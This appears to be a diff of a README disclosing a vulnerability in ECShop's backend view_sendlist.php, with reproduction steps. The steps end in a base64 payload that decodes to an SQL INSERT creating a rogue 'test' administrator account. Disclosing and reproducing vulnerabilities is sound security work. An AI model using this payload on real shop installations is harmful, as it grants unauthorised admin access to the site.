curlyyyyyyyy/ecshop/README.md

 Vulnerabilities Reproduction:

-1. Log in to the backend, visit the view_ sendlist.php, and then capture the packet
+1. Log in to the backend, visit the view_ sendlist.php, and then capture the packet.

 2. Enter the SQL statement to be executed, and then convert it into base64 encoding.
 Here we take adding the test administrator user as an example.

 <img width="415" alt="image" src="https://github.com/curlyyyyyyyy/ecshop/assets/155808433/235fd585-510c-48a4-b749-163d3765b972">

 Here is the base64 encoding.
 aW5zZXJ0IGludG8gZWNzX2FkbWluX3VzZXIodXNlcl9uYW1lLGVtYWlsLHBhc3N3b3JkLGFjdGlvbl9saXN0LG5hdl9saXN0LGFnZW5jeV9pZCkgdmFsdWVzKCd0ZXN0JywnMTIzMTIzQDEyMy5jb20nLCc0ZmNlZDlhYTY2YzQzZTVmYzg3ZDVmOTE3NjIwMWViMycsJzEnLCcxJywnMScpOyM=